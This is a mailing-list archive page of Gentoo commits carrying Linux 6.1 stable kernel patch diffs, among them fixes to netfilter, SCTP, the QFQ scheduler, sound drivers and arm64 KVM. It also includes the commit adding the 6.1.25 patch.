+ 	mptcp_v6_prot.obj_size = sizeof(struct mptcp6_sock);
+ 
+ 	err = proto_register(&mptcp_v6_prot, 1);
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 1a9d759d0a026..12d815b9aa131 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -3391,6 +3391,64 @@ static int nft_table_validate(struct net *net, const struct nft_table *table)
+ 	return 0;
+ }
+ 
++int nft_setelem_validate(const struct nft_ctx *ctx, struct nft_set *set,
++			 const struct nft_set_iter *iter,
++			 struct nft_set_elem *elem)
++{
++	const struct nft_set_ext *ext = nft_set_elem_ext(set, elem->priv);
++	struct nft_ctx *pctx = (struct nft_ctx *)ctx;
++	const struct nft_data *data;
++	int err;
++
++	if (nft_set_ext_exists(ext, NFT_SET_EXT_FLAGS) &&
++	    *nft_set_ext_flags(ext) & NFT_SET_ELEM_INTERVAL_END)
++		return 0;
++
++	data = nft_set_ext_data(ext);
++	switch (data->verdict.code) {
++	case NFT_JUMP:
++	case NFT_GOTO:
++		pctx->level++;
++		err = nft_chain_validate(ctx, data->verdict.chain);
++		if (err < 0)
++			return err;
++		pctx->level--;
++		break;
++	default:
++		break;
++	}
++
++	return 0;
++}
++
++struct nft_set_elem_catchall {
++	struct list_head	list;
++	struct rcu_head		rcu;
++	void			*elem;
++};
++
++int nft_set_catchall_validate(const struct nft_ctx *ctx, struct nft_set *set)
++{
++	u8 genmask = nft_genmask_next(ctx->net);
++	struct nft_set_elem_catchall *catchall;
++	struct nft_set_elem elem;
++	struct nft_set_ext *ext;
++	int ret = 0;
++
++	list_for_each_entry_rcu(catchall, &set->catchall_list, list) {
++		ext = nft_set_elem_ext(set, catchall->elem);
++		if (!nft_set_elem_active(ext, genmask))
++			continue;
++
++		elem.priv = catchall->elem;
++		ret = nft_setelem_validate(ctx, set, NULL, &elem);
++		if (ret < 0)
++			return ret;
++	}
++
++	return ret;
++}
++
+ static struct nft_rule *nft_rule_lookup_byid(const struct net *net,
+ 					     const struct nft_chain *chain,
+ 					     const struct nlattr *nla);
+@@ -4695,12 +4753,6 @@ err_set_name:
+ 	return err;
+ }
+ 
+-struct nft_set_elem_catchall {
+-	struct list_head	list;
+-	struct rcu_head		rcu;
+-	void			*elem;
+-};
+-
+ static void nft_set_catchall_destroy(const struct nft_ctx *ctx,
+ 				     struct nft_set *set)
+ {
+@@ -5988,7 +6040,8 @@ static int nft_add_set_elem(struct nft_ctx *ctx, struct nft_set *set,
+ 	if (err < 0)
+ 		return err;
+ 
+-	if (!nla[NFTA_SET_ELEM_KEY] && !(flags & NFT_SET_ELEM_CATCHALL))
++	if (((flags & NFT_SET_ELEM_CATCHALL) && nla[NFTA_SET_ELEM_KEY]) ||
++	    (!(flags & NFT_SET_ELEM_CATCHALL) && !nla[NFTA_SET_ELEM_KEY]))
+ 		return -EINVAL;
+ 
+ 	if (flags != 0) {
+@@ -6980,7 +7033,7 @@ static int nf_tables_newobj(struct sk_buff *skb, const struct nfnl_info *info,
+ 	}
+ 
+ 	if (nla[NFTA_OBJ_USERDATA]) {
+-		obj->udata = nla_memdup(nla[NFTA_OBJ_USERDATA], GFP_KERNEL);
++		obj->udata = nla_memdup(nla[NFTA_OBJ_USERDATA], GFP_KERNEL_ACCOUNT);
+ 		if (obj->udata == NULL)
+ 			goto err_userdata;
+ 
+diff --git a/net/netfilter/nft_lookup.c b/net/netfilter/nft_lookup.c
+index dfae12759c7cd..d9ad1aa818564 100644
+--- a/net/netfilter/nft_lookup.c
++++ b/net/netfilter/nft_lookup.c
+@@ -198,37 +198,6 @@ nla_put_failure:
+ 	return -1;
+ }
+ 
+-static int nft_lookup_validate_setelem(const struct nft_ctx *ctx,
+-				       struct nft_set *set,
+-				       const struct nft_set_iter *iter,
+-				       struct nft_set_elem *elem)
+-{
+-	const struct nft_set_ext *ext = nft_set_elem_ext(set, elem->priv);
+-	struct nft_ctx *pctx = (struct nft_ctx *)ctx;
+-	const struct nft_data *data;
+-	int err;
+-
+-	if (nft_set_ext_exists(ext, NFT_SET_EXT_FLAGS) &&
+-	    *nft_set_ext_flags(ext) & NFT_SET_ELEM_INTERVAL_END)
+-		return 0;
+-
+-	data = nft_set_ext_data(ext);
+-	switch (data->verdict.code) {
+-	case NFT_JUMP:
+-	case NFT_GOTO:
+-		pctx->level++;
+-		err = nft_chain_validate(ctx, data->verdict.chain);
+-		if (err < 0)
+-			return err;
+-		pctx->level--;
+-		break;
+-	default:
+-		break;
+-	}
+-
+-	return 0;
+-}
+-
+ static int nft_lookup_validate(const struct nft_ctx *ctx,
+ 			       const struct nft_expr *expr,
+ 			       const struct nft_data **d)
+@@ -244,9 +213,12 @@ static int nft_lookup_validate(const struct nft_ctx *ctx,
+ 	iter.skip	= 0;
+ 	iter.count	= 0;
+ 	iter.err	= 0;
+-	iter.fn		= nft_lookup_validate_setelem;
++	iter.fn		= nft_setelem_validate;
+ 
+ 	priv->set->ops->walk(ctx, priv->set, &iter);
++	if (!iter.err)
++		iter.err = nft_set_catchall_validate(ctx, priv->set);
++
+ 	if (iter.err < 0)
+ 		return iter.err;
+ 
+diff --git a/net/sched/sch_qfq.c b/net/sched/sch_qfq.c
+index cf5ebe43b3b4e..02098a02943eb 100644
+--- a/net/sched/sch_qfq.c
++++ b/net/sched/sch_qfq.c
+@@ -421,15 +421,16 @@ static int qfq_change_class(struct Qdisc *sch, u32 classid, u32 parentid,
+ 	} else
+ 		weight = 1;
+ 
+-	if (tb[TCA_QFQ_LMAX]) {
++	if (tb[TCA_QFQ_LMAX])
+ 		lmax = nla_get_u32(tb[TCA_QFQ_LMAX]);
+-		if (lmax < QFQ_MIN_LMAX || lmax > (1UL << QFQ_MTU_SHIFT)) {
+-			pr_notice("qfq: invalid max length %u\n", lmax);
+-			return -EINVAL;
+-		}
+-	} else
++	else
+ 		lmax = psched_mtu(qdisc_dev(sch));
+ 
++	if (lmax < QFQ_MIN_LMAX || lmax > (1UL << QFQ_MTU_SHIFT)) {
++		pr_notice("qfq: invalid max length %u\n", lmax);
++		return -EINVAL;
++	}
++
+ 	inv_w = ONE_FP / weight;
+ 	weight = ONE_FP / inv_w;
+ 
+diff --git a/net/sctp/socket.c b/net/sctp/socket.c
+index 507b2ad5ef7c7..17185200079d5 100644
+--- a/net/sctp/socket.c
++++ b/net/sctp/socket.c
+@@ -5102,13 +5102,17 @@ static void sctp_destroy_sock(struct sock *sk)
+ }
+ 
+ /* Triggered when there are no references on the socket anymore */
+-static void sctp_destruct_sock(struct sock *sk)
++static void sctp_destruct_common(struct sock *sk)
+ {
+ 	struct sctp_sock *sp = sctp_sk(sk);
+ 
+ 	/* Free up the HMAC transform. */
+ 	crypto_free_shash(sp->hmac);
++}
+ 
++static void sctp_destruct_sock(struct sock *sk)
++{
++	sctp_destruct_common(sk);
+ 	inet_sock_destruct(sk);
+ }
+ 
+@@ -9431,7 +9435,7 @@ void sctp_copy_sock(struct sock *newsk, struct sock *sk,
+ 	sctp_sk(newsk)->reuse = sp->reuse;
+ 
+ 	newsk->sk_shutdown = sk->sk_shutdown;
+-	newsk->sk_destruct = sctp_destruct_sock;
++	newsk->sk_destruct = sk->sk_destruct;
+ 	newsk->sk_family = sk->sk_family;
+ 	newsk->sk_protocol = IPPROTO_SCTP;
+ 	newsk->sk_backlog_rcv = sk->sk_prot->backlog_rcv;
+@@ -9666,11 +9670,20 @@ struct proto sctp_prot = {
+ 
+ #if IS_ENABLED(CONFIG_IPV6)
+ 
+-#include <net/transp_v6.h>
+-static void sctp_v6_destroy_sock(struct sock *sk)
++static void sctp_v6_destruct_sock(struct sock *sk)
++{
++	sctp_destruct_common(sk);
++	inet6_sock_destruct(sk);
++}
++
++static int sctp_v6_init_sock(struct sock *sk)
+ {
+-	sctp_destroy_sock(sk);
+-	inet6_destroy_sock(sk);
++	int ret = sctp_init_sock(sk);
++
++	if (!ret)
++		sk->sk_destruct = sctp_v6_destruct_sock;
++
++	return ret;
+ }
+ 
+ struct proto sctpv6_prot = {
+@@ -9680,8 +9693,8 @@ struct proto sctpv6_prot = {
+ 	.disconnect	= sctp_disconnect,
+ 	.accept		= sctp_accept,
+ 	.ioctl		= sctp_ioctl,
+-	.init		= sctp_init_sock,
+-	.destroy	= sctp_v6_destroy_sock,
++	.init		= sctp_v6_init_sock,
++	.destroy	= sctp_destroy_sock,
+ 	.shutdown	= sctp_shutdown,
+ 	.setsockopt	= sctp_setsockopt,
+ 	.getsockopt	= sctp_getsockopt,
+diff --git a/rust/kernel/print.rs b/rust/kernel/print.rs
+index 97ff086ba22e9..b6d1c12136de1 100644
+--- a/rust/kernel/print.rs
++++ b/rust/kernel/print.rs
+@@ -18,7 +18,11 @@ use crate::bindings;
+ 
+ // Called from `vsprintf` with format specifier `%pA`.
+ #[no_mangle]
+-unsafe fn rust_fmt_argument(buf: *mut c_char, end: *mut c_char, ptr: *const c_void) -> *mut c_char {
++unsafe extern "C" fn rust_fmt_argument(
++    buf: *mut c_char,
++    end: *mut c_char,
++    ptr: *const c_void,
++) -> *mut c_char {
+     use fmt::Write;
+     // SAFETY: The C contract guarantees that `buf` is valid if it's less than `end`.
+     let mut w = unsafe { RawFormatter::from_ptrs(buf.cast(), end.cast()) };
+diff --git a/rust/kernel/str.rs b/rust/kernel/str.rs
+index e45ff220ae50f..2c4b4bac28f42 100644
+--- a/rust/kernel/str.rs
++++ b/rust/kernel/str.rs
+@@ -29,7 +29,7 @@ impl RawFormatter {
+     /// If `pos` is less than `end`, then the region between `pos` (inclusive) and `end`
+     /// (exclusive) must be valid for writes for the lifetime of the returned [`RawFormatter`].
+     pub(crate) unsafe fn from_ptrs(pos: *mut u8, end: *mut u8) -> Self {
+-        // INVARIANT: The safety requierments guarantee the type invariants.
++        // INVARIANT: The safety requirements guarantee the type invariants.
+         Self {
+             beg: pos as _,
+             pos: pos as _,
+diff --git a/scripts/asn1_compiler.c b/scripts/asn1_compiler.c
+index 71d4a7c879008..c3e501451b41d 100644
+--- a/scripts/asn1_compiler.c
++++ b/scripts/asn1_compiler.c
+@@ -625,7 +625,7 @@ int main(int argc, char **argv)
+ 	p = strrchr(argv[1], '/');
+ 	p = p ? p + 1 : argv[1];
+ 	grammar_name = strdup(p);
+-	if (!p) {
++	if (!grammar_name) {
+ 		perror(NULL);
+ 		exit(1);
+ 	}
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 6a6c72b5ea26d..f70d6a33421d2 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9468,6 +9468,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8b47, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5d, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5e, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8b65, "HP ProBook 455 15.6 inch G10 Notebook PC", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b66, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b7a, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b7d, "HP", ALC236_FIXUP_HP_GPIO_LED),
+diff --git a/sound/soc/fsl/fsl_asrc_dma.c b/sound/soc/fsl/fsl_asrc_dma.c
+index 3b81a465814a1..05a7d1588d204 100644
+--- a/sound/soc/fsl/fsl_asrc_dma.c
++++ b/sound/soc/fsl/fsl_asrc_dma.c
+@@ -209,14 +209,19 @@ static int fsl_asrc_dma_hw_params(struct snd_soc_component *component,
+ 		be_chan = soc_component_to_pcm(component_be)->chan[substream->stream];
+ 		tmp_chan = be_chan;
+ 	}
+-	if (!tmp_chan)
+-		tmp_chan = dma_request_slave_channel(dev_be, tx ? "tx" : "rx");
++	if (!tmp_chan) {
++		tmp_chan = dma_request_chan(dev_be, tx ? "tx" : "rx");
++		if (IS_ERR(tmp_chan)) {
++			dev_err(dev, "failed to request DMA channel for Back-End\n");
++			return -EINVAL;
++		}
++	}
+ 
+ 	/*
+ 	 * An EDMA DEV_TO_DEV channel is fixed and bound with DMA event of each
+ 	 * peripheral, unlike SDMA channel that is allocated dynamically. So no
+ 	 * need to configure dma_request and dma_request2, but get dma_chan of
+-	 * Back-End device directly via dma_request_slave_channel.
++	 * Back-End device directly via dma_request_chan.
+ 	 */
+ 	if (!asrc->use_edma) {
+ 		/* Get DMA request of Back-End */
+diff --git a/sound/soc/fsl/fsl_sai.c b/sound/soc/fsl/fsl_sai.c
+index df7c0bf372451..6d88af5b287fe 100644
+--- a/sound/soc/fsl/fsl_sai.c
++++ b/sound/soc/fsl/fsl_sai.c
+@@ -1541,7 +1541,7 @@ static const struct fsl_sai_soc_data fsl_sai_imx8qm_data = {
+ 	.use_imx_pcm = true,
+ 	.use_edma = true,
+ 	.fifo_depth = 64,
+-	.pins = 1,
++	.pins = 4,
+ 	.reg_offset = 0,
+ 	.mclk0_is_mclk1 = false,
+ 	.flags = 0,
+diff --git a/sound/soc/sof/pm.c b/sound/soc/sof/pm.c
+index 8722bbd7fd3d7..26ffcbb6e30f4 100644
+--- a/sound/soc/sof/pm.c
++++ b/sound/soc/sof/pm.c
+@@ -183,6 +183,7 @@ static int sof_suspend(struct device *dev, bool runtime_suspend)
+ 	const struct sof_ipc_tplg_ops *tplg_ops = sdev->ipc->ops->tplg;
+ 	pm_message_t pm_state;
+ 	u32 target_state = snd_sof_dsp_power_target(sdev);
++	u32 old_state = sdev->dsp_power_state.state;
+ 	int ret;
+ 
+ 	/* do nothing if dsp suspend callback is not set */
+@@ -192,7 +193,12 @@ static int sof_suspend(struct device *dev, bool runtime_suspend)
+ 	if (runtime_suspend && !sof_ops(sdev)->runtime_suspend)
+ 		return 0;
+ 
+-	if (tplg_ops && tplg_ops->tear_down_all_pipelines)
++	/* we need to tear down pipelines only if the DSP hardware is
++	 * active, which happens for PCI devices. if the device is
++	 * suspended, it is brought back to full power and then
++	 * suspended again
++	 */
++	if (tplg_ops && tplg_ops->tear_down_all_pipelines && (old_state == SOF_DSP_PM_D0))
+ 		tplg_ops->tear_down_all_pipelines(sdev, false);
+ 
+ 	if (sdev->fw_state != SOF_FW_BOOT_COMPLETE)
+diff --git a/tools/testing/selftests/sigaltstack/current_stack_pointer.h b/tools/testing/selftests/sigaltstack/current_stack_pointer.h
+new file mode 100644
+index 0000000000000..ea9bdf3a90b16
+--- /dev/null
++++ b/tools/testing/selftests/sigaltstack/current_stack_pointer.h
+@@ -0,0 +1,23 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++
++#if __alpha__
++register unsigned long sp asm("$30");
++#elif __arm__ || __aarch64__ || __csky__ || __m68k__ || __mips__ || __riscv
++register unsigned long sp asm("sp");
++#elif __i386__
++register unsigned long sp asm("esp");
++#elif __loongarch64
++register unsigned long sp asm("$sp");
++#elif __ppc__
++register unsigned long sp asm("r1");
++#elif __s390x__
++register unsigned long sp asm("%15");
++#elif __sh__
++register unsigned long sp asm("r15");
++#elif __x86_64__
++register unsigned long sp asm("rsp");
++#elif __XTENSA__
++register unsigned long sp asm("a1");
++#else
++#error "implement current_stack_pointer equivalent"
++#endif
+diff --git a/tools/testing/selftests/sigaltstack/sas.c b/tools/testing/selftests/sigaltstack/sas.c
+index c53b070755b65..98d37cb744fb2 100644
+--- a/tools/testing/selftests/sigaltstack/sas.c
++++ b/tools/testing/selftests/sigaltstack/sas.c
+@@ -20,6 +20,7 @@
+ #include <sys/auxv.h>
+ 
+ #include "../kselftest.h"
++#include "current_stack_pointer.h"
+ 
+ #ifndef SS_AUTODISARM
+ #define SS_AUTODISARM  (1U << 31)
+@@ -46,12 +47,6 @@ void my_usr1(int sig, siginfo_t *si, void *u)
+ 	stack_t stk;
+ 	struct stk_data *p;
+ 
+-#if __s390x__
+-	register unsigned long sp asm("%15");
+-#else
+-	register unsigned long sp asm("sp");
+-#endif
+-
+ 	if (sp < (unsigned long)sstack ||
+ 			sp >= (unsigned long)sstack + stack_size) {
+ 		ksft_exit_fail_msg("SP is not on sigaltstack\n");
+diff --git a/tools/vm/page_owner_sort.c b/tools/vm/page_owner_sort.c
+index ce860ab941629..58ebfe3924024 100644
+--- a/tools/vm/page_owner_sort.c
++++ b/tools/vm/page_owner_sort.c
+@@ -847,7 +847,7 @@ int main(int argc, char **argv)
+ 			if (cull & CULL_PID || filter & FILTER_PID)
+ 				fprintf(fout, ", PID %d", list[i].pid);
+ 			if (cull & CULL_TGID || filter & FILTER_TGID)
+-				fprintf(fout, ", TGID %d", list[i].pid);
++				fprintf(fout, ", TGID %d", list[i].tgid);
+ 			if (cull & CULL_COMM || filter & FILTER_COMM)
+ 				fprintf(fout, ", task_comm_name: %s", list[i].comm);
+ 			if (cull & CULL_ALLOCATOR) {


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-04-20 11:16 Alice Ferrazzi
  0 siblings, 0 replies; 161+ messages in thread
From: Alice Ferrazzi @ 2023-04-20 11:16 UTC (permalink / raw
  To: gentoo-commits

commit:     d5133631466633c79fa9f707ee966222cefacab2
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Thu Apr 20 11:16:06 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Thu Apr 20 11:16:06 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=d5133631

Linux patch 6.1.25

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README             |    4 +
 1024_linux-6.1.25.patch | 5046 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 5050 insertions(+)

diff --git a/0000_README b/0000_README
index ef975a1f..7c4d9865 100644
--- a/0000_README
+++ b/0000_README
@@ -139,6 +139,10 @@ Patch:  1023_linux-6.1.24.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.24
 
+Patch:  1024_linux-6.1.25.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.25
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1024_linux-6.1.25.patch b/1024_linux-6.1.25.patch
new file mode 100644
index 00000000..8ae9ea8a
--- /dev/null
+++ b/1024_linux-6.1.25.patch
@@ -0,0 +1,5046 @@
+diff --git a/Documentation/networking/ip-sysctl.rst b/Documentation/networking/ip-sysctl.rst
+index e7b3fa7bb3f73..4ecb549fd052e 100644
+--- a/Documentation/networking/ip-sysctl.rst
++++ b/Documentation/networking/ip-sysctl.rst
+@@ -337,6 +337,8 @@ tcp_app_win - INTEGER
+ 	Reserve max(window/2^tcp_app_win, mss) of window for application
+ 	buffer. Value 0 is special, it means that nothing is reserved.
+ 
++	Possible values are [0, 31], inclusive.
++
+ 	Default: 31
+ 
+ tcp_autocorking - BOOLEAN
+diff --git a/Documentation/sound/hd-audio/models.rst b/Documentation/sound/hd-audio/models.rst
+index 9b52f50a68542..1204304500147 100644
+--- a/Documentation/sound/hd-audio/models.rst
++++ b/Documentation/sound/hd-audio/models.rst
+@@ -704,7 +704,7 @@ ref
+ no-jd
+     BIOS setup but without jack-detection
+ intel
+-    Intel DG45* mobos
++    Intel D*45* mobos
+ dell-m6-amic
+     Dell desktops/laptops with analog mics
+ dell-m6-dmic
+diff --git a/Makefile b/Makefile
+index 4f9939dec2c26..1a4c4af370db8 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 24
++SUBLEVEL = 25
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/boot/dts/qcom-apq8026-lg-lenok.dts b/arch/arm/boot/dts/qcom-apq8026-lg-lenok.dts
+index 193569f0ca5f7..4bdadb7681c30 100644
+--- a/arch/arm/boot/dts/qcom-apq8026-lg-lenok.dts
++++ b/arch/arm/boot/dts/qcom-apq8026-lg-lenok.dts
+@@ -26,6 +26,16 @@
+ 	};
+ 
+ 	reserved-memory {
++		sbl_region: sbl@2f00000 {
++			reg = <0x02f00000 0x100000>;
++			no-map;
++		};
++
++		external_image_region: external-image@3100000 {
++			reg = <0x03100000 0x200000>;
++			no-map;
++		};
++
+ 		adsp_region: adsp@3300000 {
+ 			reg = <0x03300000 0x1400000>;
+ 			no-map;
+diff --git a/arch/arm/lib/uaccess_with_memcpy.c b/arch/arm/lib/uaccess_with_memcpy.c
+index 14eecaaf295fa..e4c2677cc1e9e 100644
+--- a/arch/arm/lib/uaccess_with_memcpy.c
++++ b/arch/arm/lib/uaccess_with_memcpy.c
+@@ -116,7 +116,7 @@ __copy_to_user_memcpy(void __user *to, const void *from, unsigned long n)
+ 			tocopy = n;
+ 
+ 		ua_flags = uaccess_save_and_enable();
+-		memcpy((void *)to, from, tocopy);
++		__memcpy((void *)to, from, tocopy);
+ 		uaccess_restore(ua_flags);
+ 		to += tocopy;
+ 		from += tocopy;
+@@ -178,7 +178,7 @@ __clear_user_memset(void __user *addr, unsigned long n)
+ 			tocopy = n;
+ 
+ 		ua_flags = uaccess_save_and_enable();
+-		memset((void *)addr, 0, tocopy);
++		__memset((void *)addr, 0, tocopy);
+ 		uaccess_restore(ua_flags);
+ 		addr += tocopy;
+ 		n -= tocopy;
+diff --git a/arch/arm64/kvm/arm.c b/arch/arm64/kvm/arm.c
+index 94d33e296e10c..6ce6888cf73d6 100644
+--- a/arch/arm64/kvm/arm.c
++++ b/arch/arm64/kvm/arm.c
+@@ -1870,12 +1870,33 @@ static int do_pkvm_init(u32 hyp_va_bits)
+ 	return ret;
+ }
+ 
+-static int kvm_hyp_init_protection(u32 hyp_va_bits)
++static u64 get_hyp_id_aa64pfr0_el1(void)
+ {
+-	void *addr = phys_to_virt(hyp_mem_base);
+-	int ret;
++	/*
++	 * Track whether the system isn't affected by spectre/meltdown in the
++	 * hypervisor's view of id_aa64pfr0_el1, used for protected VMs.
++	 * Although this is per-CPU, we make it global for simplicity, e.g., not
++	 * to have to worry about vcpu migration.
++	 *
++	 * Unlike for non-protected VMs, userspace cannot override this for
++	 * protected VMs.
++	 */
++	u64 val = read_sanitised_ftr_reg(SYS_ID_AA64PFR0_EL1);
++
++	val &= ~(ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_CSV2) |
++		 ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_CSV3));
++
++	val |= FIELD_PREP(ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_CSV2),
++			  arm64_get_spectre_v2_state() == SPECTRE_UNAFFECTED);
++	val |= FIELD_PREP(ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_CSV3),
++			  arm64_get_meltdown_state() == SPECTRE_UNAFFECTED);
++
++	return val;
++}
+ 
+-	kvm_nvhe_sym(id_aa64pfr0_el1_sys_val) = read_sanitised_ftr_reg(SYS_ID_AA64PFR0_EL1);
++static void kvm_hyp_init_symbols(void)
++{
++	kvm_nvhe_sym(id_aa64pfr0_el1_sys_val) = get_hyp_id_aa64pfr0_el1();
+ 	kvm_nvhe_sym(id_aa64pfr1_el1_sys_val) = read_sanitised_ftr_reg(SYS_ID_AA64PFR1_EL1);
+ 	kvm_nvhe_sym(id_aa64isar0_el1_sys_val) = read_sanitised_ftr_reg(SYS_ID_AA64ISAR0_EL1);
+ 	kvm_nvhe_sym(id_aa64isar1_el1_sys_val) = read_sanitised_ftr_reg(SYS_ID_AA64ISAR1_EL1);
+@@ -1883,6 +1904,12 @@ static int kvm_hyp_init_protection(u32 hyp_va_bits)
+ 	kvm_nvhe_sym(id_aa64mmfr0_el1_sys_val) = read_sanitised_ftr_reg(SYS_ID_AA64MMFR0_EL1);
+ 	kvm_nvhe_sym(id_aa64mmfr1_el1_sys_val) = read_sanitised_ftr_reg(SYS_ID_AA64MMFR1_EL1);
+ 	kvm_nvhe_sym(id_aa64mmfr2_el1_sys_val) = read_sanitised_ftr_reg(SYS_ID_AA64MMFR2_EL1);
++}
++
++static int kvm_hyp_init_protection(u32 hyp_va_bits)
++{
++	void *addr = phys_to_virt(hyp_mem_base);
++	int ret;
+ 
+ 	ret = create_hyp_mappings(addr, addr + hyp_mem_size, PAGE_HYP);
+ 	if (ret)
+@@ -2057,6 +2084,8 @@ static int init_hyp_mode(void)
+ 		cpu_prepare_hyp_mode(cpu);
+ 	}
+ 
++	kvm_hyp_init_symbols();
++
+ 	if (is_protected_kvm_enabled()) {
+ 		init_cpu_logical_map();
+ 
+@@ -2064,9 +2093,7 @@ static int init_hyp_mode(void)
+ 			err = -ENODEV;
+ 			goto out_err;
+ 		}
+-	}
+ 
+-	if (is_protected_kvm_enabled()) {
+ 		err = kvm_hyp_init_protection(hyp_va_bits);
+ 		if (err) {
+ 			kvm_err("Failed to init hyp memory protection\n");
+diff --git a/arch/arm64/kvm/hyp/include/nvhe/fixed_config.h b/arch/arm64/kvm/hyp/include/nvhe/fixed_config.h
+index 07edfc7524c94..37440e1dda930 100644
+--- a/arch/arm64/kvm/hyp/include/nvhe/fixed_config.h
++++ b/arch/arm64/kvm/hyp/include/nvhe/fixed_config.h
+@@ -33,11 +33,14 @@
+  * Allow for protected VMs:
+  * - Floating-point and Advanced SIMD
+  * - Data Independent Timing
++ * - Spectre/Meltdown Mitigation
+  */
+ #define PVM_ID_AA64PFR0_ALLOW (\
+ 	ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_FP) | \
+ 	ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_AdvSIMD) | \
+-	ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_DIT) \
++	ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_DIT) | \
++	ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_CSV2) | \
++	ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_CSV3) \
+ 	)
+ 
+ /*
+diff --git a/arch/arm64/kvm/hyp/nvhe/sys_regs.c b/arch/arm64/kvm/hyp/nvhe/sys_regs.c
+index 0f9ac25afdf40..3d5121ee39777 100644
+--- a/arch/arm64/kvm/hyp/nvhe/sys_regs.c
++++ b/arch/arm64/kvm/hyp/nvhe/sys_regs.c
+@@ -84,19 +84,12 @@ static u64 get_restricted_features_unsigned(u64 sys_reg_val,
+ 
+ static u64 get_pvm_id_aa64pfr0(const struct kvm_vcpu *vcpu)
+ {
+-	const struct kvm *kvm = (const struct kvm *)kern_hyp_va(vcpu->kvm);
+ 	u64 set_mask = 0;
+ 	u64 allow_mask = PVM_ID_AA64PFR0_ALLOW;
+ 
+ 	set_mask |= get_restricted_features_unsigned(id_aa64pfr0_el1_sys_val,
+ 		PVM_ID_AA64PFR0_RESTRICT_UNSIGNED);
+ 
+-	/* Spectre and Meltdown mitigation in KVM */
+-	set_mask |= FIELD_PREP(ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_CSV2),
+-			       (u64)kvm->arch.pfr0_csv2);
+-	set_mask |= FIELD_PREP(ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_CSV3),
+-			       (u64)kvm->arch.pfr0_csv3);
+-
+ 	return (id_aa64pfr0_el1_sys_val & allow_mask) | set_mask;
+ }
+ 
+diff --git a/arch/arm64/kvm/pmu-emul.c b/arch/arm64/kvm/pmu-emul.c
+index 67770375c5eed..ed12c5355afbb 100644
+--- a/arch/arm64/kvm/pmu-emul.c
++++ b/arch/arm64/kvm/pmu-emul.c
+@@ -531,6 +531,7 @@ void kvm_pmu_handle_pmcr(struct kvm_vcpu *vcpu, u64 val)
+ 		for_each_set_bit(i, &mask, 32)
+ 			kvm_pmu_set_counter_value(vcpu, i, 0);
+ 	}
++	kvm_vcpu_pmu_restore_guest(vcpu);
+ }
+ 
+ static bool kvm_pmu_counter_is_enabled(struct kvm_vcpu *vcpu, u64 select_idx)
+diff --git a/arch/arm64/kvm/sys_regs.c b/arch/arm64/kvm/sys_regs.c
+index 1f80e17a64608..457e74f1f6717 100644
+--- a/arch/arm64/kvm/sys_regs.c
++++ b/arch/arm64/kvm/sys_regs.c
+@@ -707,7 +707,6 @@ static bool access_pmcr(struct kvm_vcpu *vcpu, struct sys_reg_params *p,
+ 		if (!kvm_supports_32bit_el0())
+ 			val |= ARMV8_PMU_PMCR_LC;
+ 		kvm_pmu_handle_pmcr(vcpu, val);
+-		kvm_vcpu_pmu_restore_guest(vcpu);
+ 	} else {
+ 		/* PMCR.P & PMCR.C are RAZ */
+ 		val = __vcpu_sys_reg(vcpu, PMCR_EL0)
+diff --git a/arch/arm64/net/bpf_jit.h b/arch/arm64/net/bpf_jit.h
+index a6acb94ea3d63..c2edadb8ec6a3 100644
+--- a/arch/arm64/net/bpf_jit.h
++++ b/arch/arm64/net/bpf_jit.h
+@@ -281,4 +281,8 @@
+ /* DMB */
+ #define A64_DMB_ISH aarch64_insn_gen_dmb(AARCH64_INSN_MB_ISH)
+ 
++/* ADR */
++#define A64_ADR(Rd, offset) \
++	aarch64_insn_gen_adr(0, offset, Rd, AARCH64_INSN_ADR_TYPE_ADR)
++
+ #endif /* _BPF_JIT_H */
